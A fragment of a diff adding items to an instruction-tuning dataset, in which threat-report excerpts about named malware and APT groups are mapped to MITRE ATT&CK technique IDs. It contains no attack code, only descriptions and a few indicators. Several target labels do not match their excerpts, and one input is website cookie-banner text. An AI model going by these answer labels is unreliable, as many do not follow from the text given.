threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The screenshot above shows an abbreviated view of the in-memory PowerShell backdoor. The PowerShell backdoor has the following capabilities", + "output": "- T1049: System Network Connections Discovery\n- T1027: Obfuscated Files or Information\n- T1518: Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The reason for this is that most of the file comprises meaningless overlay data, since the file is an automatically generated AutoIT executable with an AutoIT3 script embedded inside. Once started, it downloads additional malware from the C2 and also uploads some basic system information, stealing, among other things, the user\u2019s Google Chrome credentials. The backdoor also pings the C2 server at regular intervals. A good security analyst can spot this while analyzing firewall log files and thereby find out that something suspicious might be going on in the network", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use the \u2018at' or \u2018schtask' commands to register a scheduled task to be executed in a few minutes. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. In particular, review network access for use of mobile USB modems on corporate systems", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This structure parses out executable scripts from data provided via a remote operator. In this case, the REGEX value indicates this implant will receive scripts compressed (tar files). The malware will then decompress them before executing the embedded script. Analysis indicates the WellMail implant is similar in design and structure to the WellMess implant -- and both accept and execute shell scripts from a remote operator", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Narrow attacks targeted the Automotive industry among others, while the large malicious spam campaigns appear to be associated with threat actor TA505, an actor responsible for many large-scale attacks since at least 2014", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We have discovered that malware dubbed WinDealer, spread by Chinese-speaking APT actor LuoYu, has an ability to perform intrusions through a man-on-the-side attack", + "output": "- T1204.001: User Execution - Malicious Link\n- T1566.002: Phishing - Spearphishing Link\n- T1566.001: Phishing - Spearphishing Attachment\n- T1120: Peripheral Device Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The configuration file for Torisma is encrypted using the algorithm VEST[1] in addition to the communication sent over the C2 channel. From our research this encryption method is not commonly used anywhere, in fact it was a proposed cipher that did not become a standard to be implemented in general technologies[2", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In response to historical disclosures detailing TA416 PlugX malware infection and encoding methods, the group appears to have adopted a rapid rate of development for their PlugX payloads. The group uses different legitimate PE files to initiate sideloading, as well as a variety of PlugX DLL loaders including the PotPlayer and DocCon versions noted in this publication. TA416 also uses different variants of the final PlugX payload in which the communication routines are observed to be different when closely analyzed. Additionally, the payload DAT file decryption method has evolved regularly since the beginning of 2022. Several observed decryption schemas and a sample configuration are included below with date ranges detailing the evolution of observed PlugX payloads", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Usually, after infection the bot sends a \u2018PING\u2019 message, \u2018SYSTEM INFO\u2019 message and \u2018ASK for COMMAND\u2019 message, and the C2 replies with \u2018ACK\u2019 and \u2018COMMAND\u2019 messages. If additional modules were pushed by the C2, the bot sends a \u2018STOLEN INFO\u2019 message containing data stolen by the modules", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) An application is bundled with virtualization software, a Linux image and additional files used to achieve persistence. 2) User downloads the application and follows attached instructions on how to install it. 3) LoudMiner is installed first, the actual VST software after. 4) LoudMiner hides itself and becomes persistent on reboot. 5) The Linux virtual machine is launched and the mining starts. 6) Scripts inside the virtual machine can contact the C&C server to update the miner (configuration and binaries", + "output": "- T1218.007: System Binary Proxy Execution - Msiexec\n- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once on the network, the attackers engaged in network reconnaissance and retrieved a list of trusted domains and a list of domain controllers with the following commands", + "output": "- T1482: Domain Trust Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ZxShell.dll is injected in a shared SVCHOST process. The Svchost group registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost is opened and the netsvc group value data is queried to generate a name for the service", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. Upon successful intrusion, they have used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks", + "output": "- T1082: System Information Discovery\n- T1614.001: System Location Discovery - System Language Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Like any other typical PoS malware, Pillowmint iterates a list of processes and process them two at a time. it uses the API OpenProcess() using the\u00a0PROCESS_VM_READ and PROCESS_QUERY_INFORMATION flags to obtain a handle then reads the memory\u2019s content via ReadProcessMemory() API two chunks at a time. Depending on the Pillowmint version, it may encrypt the stolen CC data with AES encryption algorithm + Base64. This is then written to a file named \"\"ldb_e.log\"\" in Windows System directory\"", + "output": "- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Along with the EDRPOU numbers, the backdoor collects proxy and email settings, including usernames and passwords, from the M.E.Doc application", + "output": "- T1087.003: Account Discovery - Email Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kimsuky is a highly motivated threat actor targeting a number of entities in South Korea. This group has been relentlessly creating new infection chains to deliver different types of malware to their victims. Such targeted attacks can result in the leak of restricted research, unauthorized access for espionage and even destructive attacks against target organizations", + "output": "- T1588.002: Obtain Capabilities - Tool" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once the Bazar loader downloads its payload, the Bazar backdoor, it is decrypted using the same method as the aforementioned Team9 variant", + "output": "- T1104: Multi-Stage Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For the investigators at NCC Group and Fox-IT these pieces of evidence supported the hypothesis of the adversary achieving credentials access by brute force, and more specifically by credential stuffing or password spraying", + "output": "- T1589.001: Gather Victim Identity Information - Credentials" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After loading its configuration data, GoldMax checks the current date-time value of the compromised system against the activation date from the configuration data", + "output": "- T1016: System Network Configuration Discovery\n- T1124: System Time Discovery\n- T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once the VBScript in XSL has been run, console commands launched by the JS code continue to be executed. Three files are copied into the folder OFFICE12 that was created in the user profile. Those files are", + "output": "- T1220: XSL Script Processing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "POSHSPY makes the most of using built-in Windows features \u2013 so-called \u201cliving off the land\u201d \u2013 to make an especially stealthy backdoor. POSHSPY's use of WMI to both store and persist the backdoor code makes it nearly invisible to anyone not familiar with the intricacies of WMI. Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory. The backdoor's infrequent beaconing, traffic obfuscation, extensive encryption and use of geographically local, legitimate websites for command and control (C2) make identification of its network traffic difficult. Every aspect of POSHSPY is efficient and covert", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attack typically begins with an attempt \u2013 most probably via a spearphishing email \u2013 to lure the intended victim into running the malicious dropper, which is attached to the email. In order to increase the likelihood that the unsuspecting victim will actually click on it, the malicious executable masquerades as a document or spreadsheet by displaying a fake icon", + "output": "- T1204.002: User Execution - Malicious File\n- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "From the main function, the malware invokes a function named eiht_get_update. This function attempts to read a remote file (ret.txt) from andrewka6.pythonanywhere.com that contained the address of the remote command and control server. If that failed, the malware would default to using the hard-coded (albeit encrypted) IP address 167.71.237.219. In order to gather information about the infected host, it invokes a function named: ei_get_host_info \u2026which in turn invokes various macOS APIs such as getlogin and gethostname", + "output": "- T1620: Reflective Code Loading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"After analyzing the final payload, we determined the winner was\u2026 a Remote Administration Tool, which we have named ROKRAT. The address used in the email was 'kgf2016@yonsei.ac.kr' which is the contact email of the Korea Global Forum where the slogan in 2016 was \"\"Peace and Unification of the Korean Peninsula\"\". This fact gives more credit and legitimacy to the email. This file is decoded and finally an executable is launched: ROKRAT. This RAT has the added complexity that the command and control servers are legitimate websites. The malware uses Twitter and two cloud platforms, Yandex and Mediafire, apparently for both C2 communications and exfiltration platforms. Unfortunately, these platforms are difficult to block globally within organizations as their use can be viewed as legitimate in most cases. Additionally, these 3 platforms all make use of HTTPS connectivity, making it much more difficult to identify specific patterns or the usage of specific tokens\"", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Skip to main content . We use optional cookies to improve your experience on our websites, such as through social media connections, and to display personalized advertising based on your online activity. If you reject optional cookies, only cookies necessary to provide you the services will be used. Using reg to configure the registry of remote computers limits the parameters that you can use in some operations. Check the syntax and parameters for each operation to verify that they can be used on remote computers . In this article", + "output": "- T1112: Modify Registry\n- T1012: Query Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) \u2014 This simple downloader's code is similar to the main xxmm payload. MSGet \u2014 This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. MSGet typically downloads encoded binaries from hard-coded URLs. DGet \u2014 This simple downloader (see Figure 4) is similar to the wget web server retrieval tool. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The\u202fSodomMain\u202fmodule is\u202fLookBack\u202fmalware\u2019s remote access Trojan module that can send and receive numerous commands indicative of its function as a RAT. The malware is delivered within the encoded data\u202fthat is received by the\u202fSodomNormal\u202fmodule as part of its initial beacon response. It then runs within the\u202fSodomNormal\u202fmodule and\u202fuses its\u202f\u201csend_data\u201d\u202ffunction for C&C communications", + "output": "- T1574.002: Hijack Execution Flow - DLL Side-Loading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - Screen Capture Tool\u2014 This tool can capture the desktop of a victim's system (see Figure 5). Figure 5. Screen Capture Tool usage. Source: Secureworks) - RarStar \u2014 This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. WinRAR \u2014 This tool extracts tools for lateral movement and compresses data for exfiltration. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. Install a background monitor tool (e.g", + "output": "- T1113: Screen Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The shellcode then creates a string that it uses to create a registry key to automatically run the final payload each time the system starts. It then opens the registry key 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon' and sets the value to the \"\"Shell\"\" subkey to the previously created string. Ultimately, the following registry key is created for persistence\"", + "output": "- T1547.014: Boot or Logon Autostart Execution - Active Setup\n- T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We at Team Nautilus detected and analyzed the Docker Hub account hildeteamtnt, which was used by TeamTNT to store their malicious images. Also, \u2018minerescape\u2019 contained a shell script executing a Python file - minedaemon.py. Using a web service (iplogger[.]org) to transmit collected data to the attacker during the discovery process, for instance, the number of cores in the CPU, its speed, system details (using uname -a), and targeted host IP address. Logging the activity and encoding it into files (using Base64). The script sbs.sh: - Downloading 00.jpg (as /usr/bin/dns_ipv4.tar.gz) which is the file /usr/bin/bioset. Creating a child process that listens to the socket and communicates with the father using a method called \u2018Named PIPE\u2019 (also known as FIFO). The father is responsible for deciphering messages and writing it back to the child on the PIPE. Creating a child process that listens to the socket and communicates with the father using a method called \u2018Named PIPE\u2019 (also known as FIFO). - The father is responsible for deciphering messages and writing it back to the child on the PIPE. Logging the activity and encoding it into files (using Base64). - Defense Evasion: Deleting command history. Logging the activity and encoding it into files (using Base64). Defense Evasion Techniques: Removing system logs (/var/log/syslog). Deleting command history. Logging the activity and encoding it into files (using Base64). - Defense Evasion Techniques: Removing system logs (/var/log/syslog). Deleting command history. Encoding many snippets with base64 (the same snippet may be encoded multiple times). To sum it up . Over four months, TeamTNT uploaded various images, with some being used to perform attacks in the wild", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In September 2017, Proofpoint researchers detailed the history and ongoing activities of an actor we track as TA505. TA505 was behind many of the Dridex campaigns that plagued organizations in 2015 and introduced Locky ransomware in 2016, bringing unprecedented scale to malicious spam distribution. Since we wrote our original TA505 profile, the actor has continued to explore the use of new malicious attachments and new payloads. In 2018, though, the scale and regularity of their campaigns decreased, while the diversity of payloads has increased. Given the importance of this actor in the email threat landscape we wanted to revisit our profile and update it with the latest activity from TA505", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN6 used encoded PowerShell commands to install Cobalt Strike on compromised systems. The attacker made use of Cobalt Strike\u2019s \u201cpsexec\u201d lateral movement command to create a Windows service named with a random 16-character string on the target system and execute encoded PowerShell. In some cases, the encoded PowerShell commands were used to download and execute content hosted on the paste site hxxps://pastebin[.]com", + "output": "- T1102: Web Service\n- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "At this point, the script establishes an HTTP connection to the C2 server. If the server response is comprised only of the same GUID that the malware sent, the script deletes itself. In the case of the second-stage script from Variant A, the script deletes the registry key where it is installed. In the case of Variant C, the script deletes the file from which it is running. If instead the server responds with any data other than the GUID, the second-stage script decrypts the data and saves it as a file", + "output": "- T1070: Indicator Removal\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Since the original publication of this approach, Proofpoint researchers have observed a number of actors -- \u201cearly adopters\u201d -- abusing this file format by embedding it inside Microsoft Word and PDF documents. While the combination of the technique with the Microsoft Word container was described in the initial research, embedding inside PDFs has not been documented and likely originated with another source", + "output": "- T1204.002: User Execution - Malicious File\n- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Watering holes - Weaponized documents exploiting the Dynamic Data Exchange (DDE) method - Weaponized documents exploiting the CVE-2018-0798 vulnerability in Equation Editor - Exploitation of the CVE-2019-0604 vulnerability in Sharepoint - Supply chain attack that compromises a chat software installer, Able Desktop - Exploitation of recent vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in Microsoft Exchange Server", + "output": "- T1195.002: Supply Chain Compromise - Compromise Software Supply Chain\n- T1190: Exploit Public-Facing Application" + }, + 